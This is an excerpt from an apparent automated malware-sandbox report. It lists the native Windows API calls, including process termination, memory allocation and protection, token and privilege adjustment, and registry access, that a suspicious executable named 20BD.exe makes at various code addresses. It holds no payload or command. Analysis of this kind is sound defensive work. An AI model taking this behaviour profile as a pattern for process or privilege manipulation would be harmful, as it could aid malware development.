Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017DA Sleep,NtTerminateProcess, 20_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017F8 NtTerminateProcess, 20_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040209A NtQuerySystemInformation, 20_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_004017A3 Sleep,NtTerminateProcess, 20_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA98C0 ZwDuplicateObject,LdrInitializeThunk, 20_2_6ABA98C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9820 ZwEnumerateKey,LdrInitializeThunk, 20_2_6ABA9820
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9860 ZwQuerySystemInformation,LdrInitializeThunk, 20_2_6ABA9860
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA99A0 ZwCreateSection,LdrInitializeThunk, 20_2_6ABA99A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9600 ZwOpenKey,LdrInitializeThunk, 20_2_6ABA9600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA967A NtQueryInformationProcess,LdrInitializeThunk, 20_2_6ABA967A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9660 ZwAllocateVirtualMemory,LdrInitializeThunk, 20_2_6ABA9660
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9780 ZwMapViewOfSection,LdrInitializeThunk, 20_2_6ABA9780
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E2BB ZwWaitForAlertByThreadId, 20_2_6AB9E2BB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9AB0 ZwWaitForMultipleObjects, 20_2_6ABA9AB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB652A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 20_2_6AB652A5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 20_2_6AB61AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 20_2_6AB95AA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38ADD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 20_2_6AB6429E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAA90 ZwQuerySystemInformationEx, 20_2_6ABAAA90
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB82280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 20_2_6AB82280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB280 ZwWow64DebuggerCall, 20_2_6ABAB280
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAF0 ZwRaiseHardError, 20_2_6ABAAAF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAE0 ZwRaiseException, 20_2_6ABAAAE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9AE0 ZwTraceEvent, 20_2_6ABA9AE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 20_2_6AB8FAD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1AD6 ZwFreeVirtualMemory, 20_2_6ABF1AD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAAC0 ZwQueryWnfStateNameInformation, 20_2_6ABAAAC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 20_2_6AB9B230
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB68239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAA20 ZwQuerySecurityAttributesToken, 20_2_6ABAAA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9A00 ZwProtectVirtualMemory, 20_2_6ABA9A00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 20_2_6AC38214
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 20_2_6ABF1242
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA3A0 ZwGetCompleteWnfStateSubscription, 20_2_6ABAA3A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 20_2_6AB62B93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 20_2_6AB9939F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA390 ZwGetCachedSigningLevel, 20_2_6ABAA390
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB623F6 ZwClose,RtlFreeHeap, 20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9BF0 ZwAlertThreadByThreadId, 20_2_6ABA9BF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 20_2_6AB62BC2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69335 ZwClose,ZwClose, 20_2_6AB69335
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC16369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 20_2_6AC16369
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 20_2_6AB64B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9B00 ZwSetValueKey, 20_2_6ABA9B00
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB95306 ZwReleaseKeyedEvent, 20_2_6AB95306
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62B7E ZwSetInformationThread,ZwClose, 20_2_6AB62B7E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAB70 ZwReleaseWorkerFactoryWorker, 20_2_6ABAAB70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 20_2_6ABF8372
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAB60 ZwReleaseKeyedEvent, 20_2_6ABAAB60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 20_2_6ABE7365
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB76B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 20_2_6AB76B6B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93B48 ZwClose,ZwClose, 20_2_6AB93B48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB918B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 20_2_6AB918B9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB0B0 ZwTraceControl, 20_2_6ABAB0B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8F0AE ZwSetInformationWorkerFactory, 20_2_6AB8F0AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 20_2_6AB8E090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA890 ZwQueryDebugFilterState, 20_2_6ABAA890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9890 ZwFsControlFile, 20_2_6ABA9890
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA108B ZwClose, 20_2_6ABA108B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3884 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap, 20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 20_2_6AB6B8F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB780FC RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege, 20_2_6AB780FC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB640FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 20_2_6AB640FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC160A2 ZwQueryInformationFile, 20_2_6AC160A2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA0D0 ZwCreateTimer2, 20_2_6ABAA0D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA98D0 ZwQueryAttributesFile, 20_2_6ABA98D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA10D7 ZwOpenKey,ZwCreateKey, 20_2_6ABA10D7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFB8D0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap, 20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB670C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA00C2 ZwAlertThreadByThreadId, 20_2_6ABA00C2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9830 ZwOpenFile, 20_2_6ABA9830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38858 ZwAlertThreadByThreadId, 20_2_6AC38858
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9800 ZwOpenProcessTokenEx, 20_2_6ABA9800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 20_2_6ABF1879
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7106F ZwOpenKey,ZwClose, 20_2_6AB7106F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9840 ZwDelayExecution, 20_2_6ABA9840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB919B8 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwWaitForSingleObject,RtlQueryInformationActiveActivationContext,RtlQueryInformationActivationContext, 20_2_6AB919B8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA9B0 ZwQueryLicenseValue, 20_2_6ABAA9B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB1A0 ZwWaitForKeyedEvent, 20_2_6ABAB1A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC389E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC389E7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9990 ZwQueryVolumeInformationFile, 20_2_6ABA9990
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9980 ZwCreateEvent, 20_2_6ABA9980
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB180 ZwWaitForAlertByThreadId, 20_2_6ABAB180
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 20_2_6AB8C182
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC2A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC249A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 20_2_6ABF19C8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF193B ZwRaiseException,ZwTerminateProcess, 20_2_6ABF193B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA130 ZwCreateWaitCompletionPacket, 20_2_6ABAA130
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9920 ZwDuplicateToken, 20_2_6ABA9920
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38966
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9910 ZwAdjustPrivilegesToken, 20_2_6ABA9910
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9900 ZwOpenEvent, 20_2_6ABA9900
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1976 ZwCreateEvent, 20_2_6ABF1976
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3971 ZwOpenKeyEx, 20_2_6ABE3971
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB160 ZwUpdateWnfStateData, 20_2_6ABAB160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA160 ZwCreateWorkerFactory, 20_2_6ABAA160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB150 ZwUnsubscribeWnfStateChange, 20_2_6ABAB150
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F13B ZwOpenKey,ZwCreateKey, 20_2_6AC3F13B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 20_2_6AB8E6B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38ED6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9EA0 ZwCompareSigningLevels, 20_2_6ABA9EA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6ABF2EA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62E9F ZwCreateEvent,ZwClose, 20_2_6AB62E9F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA690 ZwOpenKeyEx, 20_2_6ABAA690
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E6F9 ZwAlpcSetInformation, 20_2_6AB8E6F9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 20_2_6ABF16FA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 20_2_6AB6B6F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABBDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 20_2_6ABBDEF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96E0 ZwFreeVirtualMemory, 20_2_6ABA96E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 20_2_6AC1BE9B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA6DE ZwRaiseHardError, 20_2_6ABEA6DE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB666D4 RtlInitUnicodeString,ZwQueryValueKey, 20_2_6AB666D4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB99ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 20_2_6AB99ED0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96D0 ZwCreateKey, 20_2_6ABA96D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 20_2_6AB62ED8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96C0 ZwSetInformationProcess, 20_2_6ABA96C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC33EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 20_2_6AC33EBC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B630 ZwWaitForKeyedEvent, 20_2_6AB6B630
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9E30 ZwCancelWaitCompletionPacket, 20_2_6ABA9E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9E20 ZwCancelTimer2, 20_2_6ABA9E20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 20_2_6ABA2E1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6ABF2E14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAE70 ZwSetInformationWorkerFactory, 20_2_6ABAAE70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9670 ZwQueryInformationProcess, 20_2_6ABA9670
